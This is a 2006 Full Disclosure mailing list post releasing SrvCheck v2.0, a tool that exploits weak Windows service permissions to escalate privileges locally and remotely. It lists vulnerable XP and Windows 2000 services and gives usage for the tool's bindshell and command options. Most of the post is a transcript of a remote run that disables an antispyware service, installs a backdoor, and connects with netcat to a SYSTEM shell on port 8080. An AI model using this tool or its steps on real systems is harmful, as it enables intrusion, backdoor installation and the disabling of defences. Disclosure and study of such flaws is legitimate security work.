Full Disclosure mailing list archives
Privilege Scalation for Windows Networks using weak Service restrictions v2.0 exploit
From: Andres Tarasco <atarasco () gmail com>
Date: Sun, 12 Feb 2006 19:28:16 +0100
Proof of concept of Sudhakar Govindavajhala and Andrew Appel paper ( http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf) Running as an unprivileged user you can test if your services are vulnerable and can be used to install a backdoor. Both source code and binary included *Microsoft advisory: http://microsoft.com/technet/security/advisory/914457.mspx* *SrvCheck v2.0 is able to perform this checks remotely using for example domain user credentials* *Here is a short list of Known vulnerable services under XP sp2:* *- Advanced User: * service: DcomLaunch ( SYSTEM ) Service: UpnpHost ( Local Service ) Service: SSDPSRV (Local Service) *- User: * Service: UpnpHost ( Local Service ) Service: SSDPSRV (Local Service) *- Network Config Operators:* service: DcomLaunch ( SYSTEM ) Service: UpnpHost ( Local Service ) Service: SSDPSRV (Local Service) Service: DHCP ( SYSTEM ) Service: NetBT (SYSTEM - .sys driver) Service DnsCache (SYSTEM) *Windows 2000 Professional SP4:* *- Power User: * service: WMI - Windows Management Instrumentation Driver Extensions ( SYSTEM ) *Third part Software:* HP: "Pml Driver HPZ12" Audodesk: "Autodesk Licensing Service" - maybe this one: http://securityfocus.com/bid/16472 D:\Programación\srvcheck2>srvcheck2.exe -? Services Permissions checker v2.0 (c) 2006 Andres Tarasco - atarasco () gmail com Usage: -l list vulnerable services -m <service> modify the configuration for that service -c <command> Command to execute throw remote service by default. bindshell application will be used -H <Host> specify a remote host to connect ip/netbiosname) -u <user> if not seletected Default logon credentials used) -p <password> if not used Default logon credentials used) -? Extended information with samples examples: srvcheck.exe -l (list local vulnerabilities) srvcheck.exe -m service (spawn a shell at port 8080) srvcheck.exe -m service -c "cmd.exe /c md c:\PWNED" srvcheck -l -H host (list remote vulnerabilities) D:\Programación\srvcheck2>srvcheck2.exe -l -H 192.168.0.1 Services Permissions checker v2.0 (c) 2006 Andres Tarasco - atarasco () gmail com [+] Trying to connect to remote SCM [+] Host: \\192.168.0.1\IPC$ [+] Username: (null) [+] Password: (null) [+] Network Connection OK [+] Listing Vulnerable Services... [Dhcp] Cliente DHCP Status: 0x4 Parameter: C:\WINDOWS\System32\svchost.exe -k netsvcs [Dnscache] Cliente DNS Status: 0x4 Parameter: C:\WINDOWS\System32\svchost.exe -k NetworkService [NetBT] NetBios a travÚs de Tcpip Status: 0x4 Parameter: System32\DRIVERS\netbt.sys [SSDPSRV] Servicio de descubrimientos SSDP Status: 0x1 Parameter: C:\WINDOWS\System32\svchost.exe -k LocalService [upnphost] Host de dispositivo Plug and Play universal Status: 0x1 Parameter: C:\WINDOWS\System32\svchost.exe [+] Analyzed 311 Services in your system [+] You were Lucky. 5 vulnerable services found D:\Programación\srvcheck2>srvcheck2.exe -H 192.168.0.1 -m upnphost Services Permissions checker v2.0 (c) 2006 Andres Tarasco - atarasco () gmail com [+] Trying to connect to remote SCM [+] Host: \\192.168.0.1\IPC$ [+] Username: (null) [+] Password: (null) [+] Network Connection OK [+] Uninstalling previous backdoors [+] Granting Remote bindshell Execution.. [+] Shutting down remote antispyware Service =) [+] Installing Backdoor Code... [+] The service have been succesfully modified =) [+] Service Opened. Trying to Start... (wait a few seconds) [+] StarteService() Error due to a non service application execution [+] Ignore it. Your application should be executed =) [+] Now connect to port 8080 and enjoy your new privileges D:\Programación\srvcheck2>nc localhost 8080 Microsoft Windows XP [Versión 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> regards, Andres Tarasco
Attachment:
srvcheck2.zip.REMOVE
Description:
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Privilege Scalation for Windows Networks using weak Service restrictions v2.0 exploit Andres Tarasco (Feb 12)
- Re: Privilege Scalation for Windows Networks using weak Service restrictions v2.0 exploit ad () heapoverflow com (Feb 12)
- Re: Privilege Scalation for Windows Networks using weak Service restrictions v2.0 exploit Andres Tarasco (Feb 12)
- Re: Privilege Scalation for Windows Networks using weak Service restrictions v2.0 exploit ad () heapoverflow com (Feb 12)